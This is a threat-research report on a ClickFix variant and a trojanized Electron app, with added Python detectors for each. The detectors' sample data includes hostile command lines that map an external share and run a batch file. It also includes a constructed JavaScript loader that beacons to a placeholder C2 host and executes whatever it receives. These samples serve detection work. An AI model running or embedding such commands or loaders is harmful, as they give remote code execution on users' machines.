This report was produced by the Threat Research Center to raise cybersecurity awareness and help improve defensive capabilities. It examines a technique that tricks users into running a harmful command on their own device. It is based on independent research, unconnected to any government, and reflects the threat landscape as observed at the time of publication.
The information is provided for informational and planning purposes only. More threat intelligence and adversary research blogs are available from Atos: https://atos.net/en/lp/cybershield

Researchers have identified a new variant of the well-known ClickFix technique. In this variant the victim is walked through opening the Run dialog with Win + R and pasting a command, so the victim executes the malicious command on their own device. The pasted command uses "net use" to map a network drive from an attacker-controlled external server, and then runs a ".cmd" batch file located on that mapped drive.
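The two observable steps of this ClickFix variant (a "net use" mapping of an external share, then a batch file executed from that share or drive letter) can be correlated in process-creation telemetry. The detector below is an added example, not code from the original report: the events are constructed to resemble Windows process-creation records (Sysmon Event ID 1 / Security 4688 fields), the hosts, shares and file names are placeholders, and the ".corp.local" internal DNS suffix is an assumption you would replace with your own.

```python
"""Flag ClickFix-style 'net use' drive mapping followed by a batch file run from that drive.

Added example, not from the original report: events, hosts, shares and file names are constructed.
"""
import ipaddress
import re

# 'net use [X:|*] \\host\share ...'  ->  (drive letter or '', UNC path)
NET_USE_RE = re.compile(r"""\bnet(?:1)?(?:\.exe)?\s+use\s+(?:(?:([a-z]):|\*)\s+)?(\\\\[^\s"]+)""", re.IGNORECASE)
# a .cmd/.bat path that lives on a UNC share or a drive letter
SCRIPT_RE = re.compile(r"""((?:\\\\[^\s"]+|[a-z]:)\\[^\s"]*\.(?:cmd|bat))\b""", re.IGNORECASE)

# RFC 1918 and loopback only; TEST-NET ranges are deliberately NOT treated as internal
PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def unc_host(path):
    # '\\host\share\x' -> 'host'; WebDAV forms 'host@SSL' / 'host@SSL@443' -> 'host'
    return path.split("\\")[2].split("@")[0].lower()


class ClickFixDetector:
    def __init__(self, internal_suffixes=(".corp.local",)):  # assumption: your internal DNS suffixes
        self.internal_suffixes = tuple(s.lower() for s in internal_suffixes)
        self.external_drives = {}  # drive letter -> external host mapped by an earlier 'net use'

    def is_internal_host(self, host):
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            return host.endswith(self.internal_suffixes)
        return any(ip in net for net in PRIVATE_NETS)

    def analyze(self, event):
        """Return the reasons this event looks like the ClickFix chain ([] if benign)."""
        cmd = event["CommandLine"]
        parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
        reasons = []
        for drive, unc in NET_USE_RE.findall(cmd):
            host = unc_host(unc)
            if not self.is_internal_host(host):
                reasons.append(f"net use maps external host {host}")
                if drive:  # remember the letter so a later '<letter>:\x.cmd' can be tied back to it
                    self.external_drives[drive.upper()] = host
        for path in SCRIPT_RE.findall(cmd):
            if path.startswith("\\\\"):
                if not self.is_internal_host(unc_host(path)):
                    reasons.append(f"batch file run directly from external share {unc_host(path)}")
            elif path[0].upper() in self.external_drives:
                letter = path[0].upper()
                reasons.append(f"batch file run from {letter}: (mapped to {self.external_drives[letter]})")
        if reasons and parent == "explorer.exe":
            reasons.append("parent is explorer.exe, consistent with a Win+R Run dialog launch")
        return reasons


def scan_events(events, internal_suffixes=(".corp.local",)):
    """Map event index -> reasons for every flagged event, correlating drive mappings across events."""
    detector = ClickFixDetector(internal_suffixes)
    flagged = {}
    for i, event in enumerate(events):
        reasons = detector.analyze(event)
        if reasons:
            flagged[i] = reasons
    return flagged


# Constructed sample events (not real telemetry)
SAMPLE_EVENTS = [
    # 0: what the Run dialog launches after the victim pastes the attacker's line
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c net use Z: \\203.0.113.10\share /user:guest x && Z:\update.cmd"},
    # 1: cmd.exe interpreting the batch file from the freshly mapped drive
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""Z:\update.cmd" "'},
    # 2: benign logon script mapping an internal home share
    {"ParentImage": r"C:\Windows\System32\gpscript.exe", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use H: \\fileserver01.corp.local\home$ /persistent:no"},
    # 3: benign batch file run from an internal share
    {"ParentImage": r"C:\Windows\System32\gpscript.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c \\fileserver01.corp.local\netlogon\login.cmd"},
    # 4: WebDAV flavour of the same trick, mapped to the next free letter
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c net use * \\cdn-update.example@SSL\DavWWWRoot && \\cdn-update.example@SSL\DavWWWRoot\setup.cmd"},
]

if __name__ == "__main__":
    for index, reasons in scan_events(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["CommandLine"], reasons, sep="\n  ")
```

Event 0 and event 4 are flagged on their own; event 1 is flagged only because the detector remembered that Z: was mapped to an external host in event 0, which is the correlation that separates this chain from an ordinary batch file on a drive letter. For a host-based check after the fact, commands typed into the Run dialog are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a "net use" entry there is worth pulling during triage.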
Rather than a well-structured script, the attackers used a heavily obfuscated one-liner that prepends malicious code to the application's legitimate code, ensuring the malicious part executes first and blocking WorkFlowy's functionality. Among the malicious code's notable behaviours: if the C2 connection cannot be established, it creates no files or folders. The C2 domain was already unresponsive when this analysis was performed.
Why Electron works well as a delivery vehicle

The malicious code runs in Electron's main process, which is a Node.js process outside the Chromium sandbox. It therefore runs with the full rights of the logged-in user and can do anything that user is allowed to do on the system.
No additional files are written to disk, and the malicious payload is packed inside the application's ".asar" archive, which makes it harder to spot.
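Because the payload sits inside the ".asar" archive rather than on disk as a separate file, a file scan of the install directory will not see it; you have to open the archive and look at the main-process entry script. The code below is an added example, not code from the original report or from WorkFlowy: it builds a minimal asar archive in memory from constructed files (the real tool's layout: an 8-byte size pickle, a header pickle carrying the JSON directory, then raw file data), reads it back without the asar CLI, and applies generic heuristics to the first line of the script named by "main" in package.json, which is where a prepended one-liner lands. The C2 hostname and the indicator patterns are assumptions for illustration.

```python
"""Inspect an Electron .asar archive for a prepended one-liner in the main-process script.

Added example, not from the original report or from WorkFlowy: archive contents are constructed.
"""
import json
import re
import struct


def build_asar(files):
    """Pack {path: bytes} into an asar archive: size pickle, header pickle (JSON), file data."""
    root = {"files": {}}
    blobs, offset = [], 0
    for path, data in files.items():
        node = root
        *dirs, name = path.split("/")
        for d in dirs:
            node = node["files"].setdefault(d, {"files": {}})
        node["files"][name] = {"size": len(data), "offset": str(offset)}  # asar stores offsets as strings
        blobs.append(data)
        offset += len(data)
    header = json.dumps(root).encode()
    padded = header + b"\0" * (-len(header) % 4)                  # pickle pads strings to 4 bytes
    header_pickle = struct.pack("<II", 4 + len(padded), len(header)) + padded
    return struct.pack("<II", 4, len(header_pickle)) + header_pickle + b"".join(blobs)


def read_asar(blob):
    """Return {path: bytes} for every file stored in the archive ('unpacked' entries live outside it)."""
    header_len = struct.unpack_from("<I", blob, 4)[0]
    json_len = struct.unpack_from("<I", blob, 12)[0]
    root = json.loads(blob[16:16 + json_len])
    base = 8 + header_len                                          # file data starts after the header pickle
    out = {}

    def walk(node, prefix):
        for name, meta in node["files"].items():
            if "files" in meta:
                walk(meta, prefix + name + "/")
            elif not meta.get("unpacked"):
                off = base + int(meta["offset"])
                out[prefix + name] = blob[off:off + meta["size"]]

    walk(root, "")
    return out


# Generic indicators of an obfuscated loader living on the first line (assumed heuristics)
INDICATORS = {
    "dynamic-eval": re.compile(r"""\beval\s*\(|\bnew\s+Function\s*\("""),
    "process-spawn": re.compile(r"""child_process|\.exec(?:Sync)?\s*\(|\.spawn\s*\("""),
    "network-module": re.compile(r"""require\s*\(\s*['"](?:https?|net|dgram)['"]\s*\)"""),
    "string-decoding": re.compile(r"""fromCharCode|Buffer\.from\([^)]*['"]base64['"]|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}"""),
    "hex-identifiers": re.compile(r"""_0x[0-9a-f]{2,}"""),
}


def scan_first_line(src, long_line=300):
    """Score only the first line: a prepended one-liner fuses with the app's own first statement."""
    first = src.split("\n", 1)[0]
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(first))
    return {"first_line_len": len(first), "indicators": hits,
            "suspicious": len(hits) >= 2 or (len(first) > long_line and bool(hits))}


def audit_asar(blob):
    """Locate the main-process entry via package.json 'main' and scan it."""
    files = read_asar(blob)
    main = json.loads(files["package.json"]).get("main", "index.js")
    return main, scan_first_line(files[main].decode("utf-8", "replace"))


# Constructed stand-in for a legitimate Electron main script
LEGIT_MAIN = b"""const { app, BrowserWindow } = require('electron');
function createWindow() {
  const win = new BrowserWindow({ width: 1200, height: 800, webPreferences: { contextIsolation: true } });
  win.loadFile('index.html');
}
app.whenReady().then(createWindow);
"""
# Constructed stand-in for the attacker's one-liner: beacons to an assumed C2 (c2.invalid), runs
# whatever comes back, swallows errors, and is glued onto the app's first line so it executes first.
ONE_LINER = (b"(function(){var _0x4f=require('child_process'),_0x1a=require('https');"
             b"_0x1a.get('https://c2.invalid/'+Buffer.from('Y2hlY2tpbg==','base64'),"
             b"function(r){var d='';r.on('data',function(c){d+=c});"
             b"r.on('end',function(){if(d)_0x4f.exec(d)})}).on('error',function(){})})();")

CLEAN_FILES = {"package.json": b'{"name":"example-app","main":"main.js"}',
               "main.js": LEGIT_MAIN, "renderer/index.html": b"<html></html>"}
TROJAN_FILES = dict(CLEAN_FILES, **{"main.js": ONE_LINER + LEGIT_MAIN})

if __name__ == "__main__":
    for label, files in (("clean", CLEAN_FILES), ("trojanized", TROJAN_FILES)):
        print(label, audit_asar(build_asar(files)))
```

On a real install the archive is resources/app.asar next to the Electron binary; point read_asar at its bytes. The first-line rule is deliberately narrow, because obfuscated app bundles (webpack output, minified vendor code) also have long, hex-heavy lines further down; the prepend pattern is what puts the loader ahead of the app's own first statement, and that is what the scan keys on. A hash comparison of app.asar against the vendor's release is the cheaper check when a known-good copy is available.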